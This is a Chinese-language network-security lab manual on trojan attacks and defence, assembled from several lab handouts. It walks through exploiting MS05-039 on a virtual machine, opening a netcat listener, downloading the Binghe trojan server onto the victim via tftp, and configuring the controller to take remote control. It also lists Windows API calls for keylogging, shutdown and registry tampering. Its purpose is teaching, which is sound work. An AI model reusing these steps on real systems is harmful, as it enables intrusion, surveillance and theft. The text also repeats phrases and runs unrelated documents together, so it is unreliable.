实验指导5:木马攻击与防范实验指导书
实验一 木马攻击与防范
实验1 木马攻击与防范一、实验目的通过对木马的练习,使读者理解和掌握木马传播和运行的机制;通过手动删除木马,掌握检查木马和删除木马的技巧,学会防御木马的相关知识,加深对木马的安全防范意识。
二、实验原理木马的全称为特洛伊木马,源自古希腊神话。
木马是隐藏在正常程序中的具有特殊功能的恶意代码,是具备破坏、删除和修改文件、发送密码、记录键盘、实施DoS攻击甚至完全控制计算机等特殊功能的后门程序。
它隐藏在目标计算机里,可以随计算机自动启动并在某一端口监听来自控制端的控制信息。
1.木马的特性木马程序为了实现其特殊功能,一般应该具有以下性质:(1)伪装性:程序将自己的服务器端伪装成合法程序,并且诱惑被攻击者执行,使木马代码会在未经授权的情况下装载到系统中并开始运行。
(2)隐藏性:木马程序同病毒程序一样,不会暴露在系统进程管理器内,也不会让使用者察觉到木马的存在,它的所有动作都是伴随其它程序进行的,因此在一般情况下使用者很难发现系统中有木马的存在。
(3)破坏性:通过远程控制,攻击者可以通过木马程序对系统中的文件进行删除、编辑操作,还可以进行诸如格式化硬盘、改变系统启动参数等恶性破坏操作。
(4)窃密性:木马程序最大的特点就是可以窥视被入侵计算机上的所有资料,这不仅包括硬盘上的文件,还包括显示器画面、使用者在操作电脑过程中在硬盘上输入的所有命令等。
2.木马的入侵途径木马入侵的主要途径是通过一定的欺骗方法,如更改图标、把木马文件与普通文件合并,欺骗被攻击者下载并执行做了手脚的木马程序,就会把木马安装到被攻击者的计算机中。
木马也可以通过Script、ActiveX及ASP、CGI交互脚本的方式入侵,由于微软的浏览器在执行Script 脚本上存在一些漏洞,攻击者可以利用这些漏洞诱导上网者单击网页,这样IE浏览器就会自动执行脚本,实现木马的下载和安装。
木马还可以利用系统的一些漏洞入侵,如微软的IIS服务器存在多种溢出漏洞,通过缓冲区溢出攻击程序造成IIS服务器溢出,获得控制权限,然后在被攻击的服务器上安装并运行木马。
网络安全实验指导书
实验报告一:黑客攻击方法及木马防范一、实验目的一、实验目的1、 了解常见的黑客攻击方法了解常见的黑客攻击方法2、 掌握常见的黑客软件的使用方法掌握常见的黑客软件的使用方法3、 掌握木马等恶意代码的防范方法掌握木马等恶意代码的防范方法二、实验内容二、实验内容1、 本机上构建虚拟机系统,在虚拟计算机上安装“冰河”服务器端,本地计算机中安装“冰河”客户端。
试用“冰河”的客户端控制服务器端计算机,记录试验步骤。
装“冰河”客户端。
试用“冰河”的客户端控制服务器端计算机,记录试验步骤。
2、 在安装冰河服务器端的计算机中,下载并安装“木马克星”,并对计算机扫描,记录扫描及查杀效果。
录扫描及查杀效果。
3、 使用“流光”扫描远程终端服务端口是否开放,记录开放的端口号,分析可能的入侵方法。
侵方法。
三、实验小结三、实验小结实验报告二:入侵检测及WEB安全技术一、实验目的一、实验目的1、了解入侵检测方法、了解入侵检测方法2、了解WEB 安全技术安全技术2、掌握常用入侵检测软件的使用方法、掌握常用入侵检测软件的使用方法3、掌握服务器的安全配置方法、掌握服务器的安全配置方法二、实验内容二、实验内容1、Snort Snort 的使用的使用的使用1.1、在网站上下载Snort Snort,并安装,并安装,并安装1.2、Snort Snort 探测规则的设置探测规则的设置探测规则的设置1.3、Snort Snort 的使用的使用的使用1.4、练习Snort 的不同运行模式的不同运行模式1.5、Snort 的日志分析的日志分析2、Web 安全技术安全技术2.1.1.配置配置Windows 2000 Server 的帐号、端口、的帐号、端口、IIS IIS IIS、安全日志、目录和文件权限等。
、安全日志、目录和文件权限等。
2.2.2.配置配置Windows 2000 NT 系统的安全。
系统的安全。
2.3.3.配置拥护管理的安全。
配置拥护管理的安全。
网络安全经典实验
网络安全经典实验网络安全经典实验:木马攻击与防御网络安全是当今社会中不可忽视的重要领域之一。
为了保护个人和组织的信息安全,人们不断进行实验研究,以提升网络安全技术水平。
木马攻击与防御是网络安全领域中的经典实验之一,通过它可以深入了解木马的工作原理以及有效的防御方法。
一、实验背景在网络安全中,木马是一种具有欺骗性的恶意软件,它隐藏在看似无害的程序中,一旦被运行,就会窃取用户的敏感信息或者给系统带来破坏。
为了更好地理解木马攻击的过程和防御方法,进行木马实验是非常必要的。
二、实验目的1. 了解木马的定义、分类、特点及危害。
2. 掌握常见的木马攻击手段及其工具。
3. 学会基本的木马防御原理和方法。
三、实验内容本实验将以实际网络环境为背景,分为两个部分进行:木马攻击和木马防御。
1. 木马攻击实验:(1) 选择一个合适的木马程序,并确保该程序的危害性较低。
(2) 将木马程序安装到某一目标计算机上。
(3) 检测木马程序是否成功植入目标计算机,并验证木马程序可以实现的功能。
2. 木马防御实验:(1) 了解常见的木马防御原理,如入侵检测系统(IDS)、入侵防御系统(IPS)、防火墙等。
(2) 配置入侵检测系统和防火墙,设置规则以屏蔽已知的木马攻击。
(3) 对目标计算机进行木马扫描,检测入侵检测系统和防火墙的防御效果。
四、实验结果与分析通过木马攻击实验,可以深入了解木马的工作原理和危害。
同时,还可以体验到木马对计算机系统的破坏力,加深对网络安全的认识。
通过木马防御实验,可以了解到入侵检测系统和防火墙在木马防御中的重要性。
通过配置防御系统并设置规则,可以有效屏蔽已知的木马攻击,提升网络的安全性。
五、实验总结通过木马攻击与防御实验,我们深入了解了木马的工作原理和防御方法。
网络安全是一个复杂的领域,不断的研究和实验是提高网络安全技术水平的必经之路。
在日常生活中,我们应该保持警惕,不随便点击不明链接或下载不明软件。
同时,定期更新操作系统和软件,使用可信的杀毒软件和防火墙等工具,以加强网络的安全性。
木马攻击及防御技术实验报告
目录第一章引言 (1)第二章木马概述 (1)2.1木马的定义及特点 (1)2.2木马的工作原理 (2)2.3木马的分类.................................................... 第三章常见的木马攻击手段3.1捆绑方式.....................................................3.2邮件和QQ冒名欺骗............................................3.3网页木马方式.................................................3.4伪装成其他文件...............................................第四章木马的防范措施4.1安装个人防火墙、木马查杀软件和及时安装系统补丁...............4.2隐藏IP和关闭不必要的端口....................................4.3使用虚拟计算机...............................................4.4关闭不必要的服务选项.........................................4.5定期检查电脑的启动项.........................................4.6不要随意打开邮件.............................................4.7谨慎下载和安装第三方软件.....................................第五章总结........................................................参考文献...........................................................第一章引言随着计算机的日益普及,人们对于“木马”一词已不陌生。
实验指导5:木马攻击与防范实验指导书
实验指导5 木马攻击与防范实验1.实验目的理解和掌握木马传播和运行的机制,掌握检查和删除木马的技巧,学会防御木马的相关知识,加深对木马的安全防范意识。
2.预备知识2.1木马及木马技术的介绍(1)木马概念介绍很多人把木马看得很神秘,其实,木马就是在用户不知道的情况下被植入用户计算机,用来获取用户计算机上敏感信息(如用户口令,个人隐私等)或使攻击者可以远程控制用户主机的一个客户服务程序。
这种客户/服务模式的原理是一台主机提供服务(服务器),另一台主机使用服务(客户机)。
作为服务器的主机一般会打开一个默认的端口并进行监听(Listen),如果有客户机向服务器的这一端口提出连接请求(Connect Request),服务器上的相应守护进程就会自动运行,来应答客户机的请求。
通常来说,被控制端相当于一台服务器,控制端则相当于一台客户机,被控制端为控制端提供预定的服务。
(2)木马的反弹端口技术由于防火墙对于进入的链接往往会进行非常严格的过滤,但是对于连出的链接却疏于防范。
于是,与一般的木马相反,反弹端口型木马的服务端(被控制端)使用主动端口,客户端(控制端)使用被动端口。
木马定时监测控制端的存在,发现控制端上线立即弹出端口主动连结控制端打开的主动端口;为了隐蔽起见,控制端的被动端口一般开在80,这样,即使用户使用端口扫描软件检查自己的端口,发现的也是类似TCP UserIP:1026ControllerIP:80 ESTABLISHED的情况,稍微疏忽一点,你就会以为是自己在浏览网页。
(3)线程插入技术木马程序的攻击性有了很大的加强,在进程隐藏方面,做了较大的改动,不再采用独立的EXE可执行文件形式,而是改为内核嵌入方式、远程线程插入技术、挂接PSAPI等。
这样木马的攻击性和隐藏性就大大增强了。
2.2木马攻击原理特洛伊木马是一个程序,它驻留在目标计算机里,可以随计算机自动启动并在某一端口进行侦听,在对接收的数据识别后,对目标计算机执行特定的操作。
堡垒机实训指导(五)木马病毒
5.再次通过使用远程桌面登录到服务端 ,并执行服务端程序。 6.关闭远程桌面,个人PC端使用客户端灰鸽子程序,点击“增加主机”,添加服务 端目标IP。
7.可进行一系列操作,如查看对方系统信息带的防火墙处阻止该进程。
2. 更新杀毒软件查杀病毒或者从官方下载有效的灰鸽子专杀工具。
实训步骤:
1. 打开已经下载好的灰鸽子木马所在的文件夹,双击灰鸽子客户端( 本实验中如果碰到灰鸽子客户端无法打开的情形,请从“灰鸽子_牵 手.zip”重新解压生成一个新的客户端程序再执行)。 2. “文件”--“配置服务程序”或直接从F12进入服务器端配置
3.进行相应的设置后,点击“生成服务器”。 4.通过 Windows 网络共享的方式,将服务端程序拷贝到虚拟主机预先共享 的文件夹share中,访问共享的用户名和密码仍然是“administrator” 和 “demo” 。
堡垒机实训指导
木马病毒
木马病毒
大竹大竹 =雷庆编 =雷庆编
实训(六)灰鸽子木马利用与防护
实训目的:
木马,又名特洛伊木马,其名称取自古希腊神话的特洛伊 木马记,它是一种基于远程控制的黑客工具,具有很强的隐蔽 性和危害性。为了达到控制服务端主机的目的,木马往往要采 用各种手段达到激活自己、加载运行的目的。本案例以国内著 名的灰鸽子木马为例讲述木马的使用和防御。 了解木马病毒对终端主机的安全威胁,以及木马病毒如何 对主机进行攻击。
网络安全实验报告 (5)
《网络安全》实验报告实验序号:5 实验项目名称:木马攻击与防范实验图1 运行nc接着再开一个dos窗口,运行ms05039 192.168.20.23 192.168.20.1 99 1图2 运行ms2)攻击成功后,在运行nc -vv -l -p 99 的dos窗口中出现如图3提示,若攻不成功请参照“缓冲区溢出攻击与防范实验”,再次进行攻击。
图3 攻击成功示意3)在此窗口中运行tftp -i 192.168.20.1 get g_server.exe图4 上载木马程序并运行图5 文件传送步骤3:运行木马客户程序控制远程主机1)打开程序端程序,单击快捷工具栏中的“添加主机”按扭图6 添加主机2)“文件管理器”使用。
点击各个驱动器或者文件夹前面的展开符号,可以浏览目标主机内容。
图7 成功下载文件后界面2)“命令控制台”使用。
单击“命令控制台”的标签,弹出命令控制台界面步骤4:删除“冰河”木马✧打开HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 如图8。
在目录中发现了一个默认的键值C:\WINNT\System32\kernel32.exe,这就是“冰河”木马在注册表中加入的键值,将它删除。
✧打开HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVesion\Runse rvices,如图9。
在目录中也发现了一个默认的键值C:\WINNT\System32\kernel32.exe,这也是“冰河”在注册表中加入的键值,将它删除。
上面两个注册表的子键目录Run和Runservices中存放的键值是系统启动时自启动的程序,一般病毒程序,木马程序,后门程序等都放在这些子键目录下,所以要经常检查这些目录下的程序。
图8 注册表编辑图9注册表编辑然后再进入C:\WINNT\System32目录,找到“冰河”的两个可执行文件Kernel32.exe 和Sysexplr.exe文件,将它们删除。
实验四:木马攻击与防范
10计科罗国民 201030457115网络安全与维护实验报告实验四:木马攻击与防范一、实验目的通过对木马的练习,使读者理解和掌握木马传播和运行的机制;通过手动删除木马,掌握检查木马和删除木马的技巧,学会防御木马的相关知识,加深对木马的安全防范意识。
二、实验要求通过实验了解木马攻击的原理,了解如何防范木马的入侵。
三、实验原理及内容木马是隐藏在正常程序中的具有特殊功能的恶意代码,是具备破坏、删除和修改文件、发送密码、记录键盘、实施DOS攻击甚至完全控制计算机等特殊功能的后门程序。
它隐藏在目标的计算机里,可以随计算机自动启动并在某一端口监听来自控制端的控制信息。
1、木马的特性木马程序为了实现某特殊功能,一般应该具有以下性质:(1)伪装性: 程序把自己的服务器端伪装成合法程序,并且诱惑被攻击者执行,使木马代码会在未经授权的情况下装载到系统中并开始运行。
(2)隐藏性:木马程序同病毒一样,不会暴露在系统进程管理器内,也不会让使用者察觉到木马的存在,它的所有动作都是伴随其它程序进行的,因此在一般情况下使用者很难发现系统中有木马的存在。
(3)破坏性:通过远程控制,攻击者可以通过木马程序对系统中的文件进行删除、编辑操作,还可以进行诸如格式化硬盘、改变系统启动参数等个性破坏操作。
(4)窃密性:木马程序最大的特点就是可以窥视被入侵计算机上的所有资料,这不仅包括硬盘上的文件,还包括显示器画面、使用者在操作电脑过程中在硬盘上输入的所有命令等。
2、木马的入侵途径木马入侵的主要途径是通过一定的欺骗方法,如更改图标、把木马文件与普通文件合并,欺骗被攻击者下载并执行做了手脚的木马程序,就会把木马安装到被攻击者的计算机中。
木马也可以通过Script、ActiveX及ASP、CGI交互脚本的方式入侵,由于微软的浏览器在执行Script脚本上存在一些漏洞,攻击者可以利用这些漏洞又到上网者单击网页,这样IE浏览器就会自动执行脚本,实现木马的下载和安装。
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
实验指导5 木马攻击与防范实验1.实验目的理解和掌握木马传播和运行的机制,掌握检查和删除木马的技巧,学会防御木马的相关知识,加深对木马的安全防范意识。
2.预备知识2.1木马及木马技术的介绍(1)木马概念介绍很多人把木马看得很神秘,其实,木马就是在用户不知道的情况下被植入用户计算机,用来获取用户计算机上敏感信息(如用户口令,个人隐私等)或使攻击者可以远程控制用户主机的一个客户服务程序。
这种客户/服务模式的原理是一台主机提供服务(服务器),另一台主机使用服务(客户机)。
作为服务器的主机一般会打开一个默认的端口并进行监听(Listen),如果有客户机向服务器的这一端口提出连接请求(Connect Request),服务器上的相应守护进程就会自动运行,来应答客户机的请求。
通常来说,被控制端相当于一台服务器,控制端则相当于一台客户机,被控制端为控制端提供预定的服务。
(2)木马的反弹端口技术由于防火墙对于进入的链接往往会进行非常严格的过滤,但是对于连出的链接却疏于防范。
于是,与一般的木马相反,反弹端口型木马的服务端(被控制端)使用主动端口,客户端(控制端)使用被动端口。
木马定时监测控制端的存在,发现控制端上线立即弹出端口主动连结控制端打开的主动端口;为了隐蔽起见,控制端的被动端口一般开在80,这样,即使用户使用端口扫描软件检查自己的端口,发现的也是类似TCP UserIP:1026ControllerIP:80 ESTABLISHED的情况,稍微疏忽一点,你就会以为是自己在浏览网页。
(3)线程插入技术木马程序的攻击性有了很大的加强,在进程隐藏方面,做了较大的改动,不再采用独立的EXE可执行文件形式,而是改为内核嵌入方式、远程线程插入技术、挂接PSAPI等。
这样木马的攻击性和隐藏性就大大增强了。
2.2木马攻击原理特洛伊木马是一个程序,它驻留在目标计算机里,可以随计算机自动启动并在某一端口进行侦听,在对接收的数据识别后,对目标计算机执行特定的操作。
木马,其实质就是一个通过端口进行通信的网络客户/服务程序。
(1)基本概念网络客户/服务模式的原理是一台主机提供服务(服务器),另一台主机接受服务(客户机)。
作为服务器的主机一般会打开一个默认的端口并进行监听(Listen),如果有客户机向服务器的这一端口提出连接请求(Connect Request),服务器上的相应程序就会自动运行,来应答客户机的请求,这个程序称为守护进程(UNIX的术语,不过已经被移植到了MS系统上)。
对于特洛伊木马,被控制端就成为一台服务器,控制端则是一台客户机,G_server.exe是守护进程,G_client是客户端应用程序。
(2)实现木马的控制功能由于Win98开放了所有的权限给用户,因此,以用户权限运行的木马程序几乎可以控制一切,下面仅对木马的主要功能进行简单的概述,主要是使用Windows API函数。
①远程监控(控制对方鼠标、键盘,并监视对方屏幕)●keybd_event模拟一个键盘动作。
●mouse_event模拟一次鼠标事件●mouse_event(dwFlags,dx,dy,cButtons,dwExtraInfo)dwFlags:●MOUSEEVENTF_ABSOLUTE 指定鼠标坐标系统中的一个绝对位置●MOUSEEVENTF_MOVE 移动鼠标●MOUSEEVENTF_LEFTDOWN 模拟鼠标左键按下●MOUSEEVENTF_LEFTUP 模拟鼠标左键抬起●MOUSEEVENTF_RIGHTDOWN 模拟鼠标右键按下●MOUSEEVENTF_RIGHTUP 模拟鼠标右键按下●dx,dy:MOUSEEVENTF_ABSOLUTE中的鼠标坐标。
②记录各种口令信息keylog begin:将击键记录在一个文本文件里,同时还记录执行输入的窗口名。
③获取系统信息a.取得计算机名GetComputerNameb.更改计算机名SetComputerNamec.当前用户GetUserNamed.系统路径e.取得系统版本f.当前显示分辨率④限制系统功能a.远程关机或重启计算机,使用WinAPI中的如下函数可以实现。
ExitWindowsEx(UINT uFlags,DWORD dwReserved) 当uFlags=EWX_LOGOFF 中止进程,然后注销=EWX_SHUTDOWN 关掉系统但不关电源=EWX_REBOOT 重新引导系统=EWX_FORCE强迫中止没有响应的进程=EWX_POWERDOWN 关掉系统及关闭电源b.锁定鼠标,ClipCursor(lpRect As RECT)可以将指针限制到指定区域,或者用ShowCursor(FALSE)把鼠标隐藏起来也可以,RECT是定义的一个矩形。
c.让对方掉线RasHangUpd.终止进程ExitProcesse.关闭窗口利用FindWindow函数找到窗口并利用SendMessage函数关闭窗口⑤远程文件操作删除文件:File delete拷贝文件:File copy共享文件:Export list(列出当前共享的驱动器、目录、权限及共享密码)⑥注册表操作在VB中只要Set RegEdit=CreateObject("WScript.Shell")就可以使用以下的注册表功能:删除键值:RegEdit.RegDelete RegKey增加键值:RegEdit.Write RegKey,RegValue获取键值:RegEdit.RegRead (Value)2.3 木马的防范建议A.不要随意打开来历不明的邮件现在许多木马都是通过邮件来传播的,当你收到来历不明的邮件时,请不要打开,应尽快删除。
并加强邮件监控系统,拒收垃圾邮件。
B.不要随意下载来历不明的软件最好是在一些知名的网站下载软件,不要下载和运行来历不明的软件。
在安装软件的同时最好用杀毒软件查看有没有病毒,之后才进行安装。
C.及时修补漏洞和关闭可疑的端口一般木马都是通过漏洞在系统上打开端口留下后门,以便上传木马文件和执行代码,在把漏洞修补上的同时,需要对端口进行检查,把可疑的端口关闭。
D.尽量少用共享文件夹如果必须使用共享文件夹,则最好设置帐号和密码保护。
注意千万不要将系统目录设置成共享,最好将系统下默认共享的目录关闭。
Windows系统默认情况下将目录设置成共享状态,这是非常危险的。
E.运行实时监控程序在上网时最好运行反木马实时监控程序和个人防火墙,并定时对系统进行病毒检查。
F.经常升级系统和更新病毒库。
3.实验环境1)预备知识要求●了解网络的基本知识;●熟练使用windows操作系统;●充分理解木马攻击原理;●熟悉缓冲溢出攻击。
2)下载和运行木马软件期间,请关闭杀毒软件的自动防护功能以及防火墙,否则程序会被当作病毒而强行终止。
3.1 运行环境1)需要下载的其它的工具软件有:●tftpd32.exe:tftp服务程序,用来传输“冰河”木马服务端程序●nc.exe:缓冲溢出攻击反向连接服务程序(参见“缓冲区溢出攻击与防范实验”);●Ms05039.exe:缓冲溢出攻击工具(参见“缓冲区溢出攻击与防范实验”);●冰河木马.exe:冰河木马程序;●gwboy092.exe:“广外男生”木马程序。
2)本实验需要用到虚拟机,因此每台实验主机都通过安装软件WMware Workstation分割出虚拟机。
真实主机P1的配置为:操作系统Windows2000 server或者windows xp sp2,并且安装ms05-039.exe缓冲区溢出攻击软件,“冰河”木马,“广外男生”木马。
虚拟机P2配置为:操作系统Windows2000 Server(没有打补丁,存在ms05039漏洞,并且安装了IIS组件)。
3)实验环境拓扑如图1所示:图1 实验网络拓扑图请根据实验环境将IP地址填入下表,表1 实验IP实验中,可把真实机P2作为攻击机,安装上“冰河”木马程序,ms05039.exe,nc.exe,tftpd32.exe和“广外男生”;虚拟机P3作为被攻击主机,安装IIS组件。
4.实验内容和步骤4.1 实验任务一:“冰河”木马本实验需要把真实主机作为攻击机,虚拟机作为靶机。
即首先利用ms05039溢出工具入侵虚拟机,然后利用“冰河”木马实现对虚拟机的完全控制。
最后对木马进行查杀。
A.“冰河”使用:冰河是一个基于TCP/IP协议和Windows操作系统的网络工具,所以首先应确保该协议已被安装且网络连接无误,然后配置服务器程序(如果不进行配置则取默认设置),并在欲监控的计算机上运行服务器端监控程序即可。
主要文件包括:a. G_Server.exe: 被监控端后台监控程序(运行一次即自动安装,可任意改名),在安装前可以先通过“G_Client”的配置本地服务器程序功能进行一些特殊配置,例如是否将动态IP发送到指定信箱、改变监听端口、设置访问口令等);b. G_Client.exe: 监控端执行程序,用于监控远程计算机和配置服务器程序。
具体功能操作包括:a.添加主机:将被监控IP地址添加至主机列表,同时设置好访问口令及端口,设置将保存在Operate.ini文件中,以后不必重输。
如果需要修改设置,可以重新添加该主机,或在主界面工具栏内重新输入访问口令及端口并保存设置。
b. 删除主机:将被监控端IP地址从主机列表中删除。
c. 自动搜索:搜索指定子网内安装有冰河的计算机。
d. 查看屏幕:查看被监控端屏幕。
e. 屏幕控制:远程模拟鼠标及键盘输入。
f.“冰河”信使:点对点聊天室。
g. 修改远程配置:在线修改访问口令,监听端口等服务器程序设置,不需要重新上传整个文件,修改后立即生效。
B.在对“冰河”有所了解之后,我们进入攻防实验阶段——使用“冰河”对目标计算机进行控制:在目标主机(虚拟机)上植入木马,即在此主机上运行G_Sever,作为服务器端;在攻击机上运行G_Client,作为控制端。
分别运行这两个.exe文件后,我们进入控制端主界面,按照以下步骤来实现对目标主机的控制。
步骤1:入侵准备工作1)下载和安装木马软件前,关闭杀毒软件的自动防护功能,避免程序会被当作病毒而强行终止。
2)运行G_CLIENT.EXE,如图2;3)选择菜单“设置”->“配置服务程序”,如图3;图3 设置木马服务4)设置访问口令为“1234567”,其它为默认值,点击“确定”生成木马的服务端程序G_SERVER.EXE。
5)将生成的木马服务程序G_SERVER.EXE拷贝到tftp服务的目录即C:\攻防\tftp32,如图4。
图4将G_SERVER.EXE拷贝到目录C:\攻防\tftp326)运行tftpd32.exe,如图5。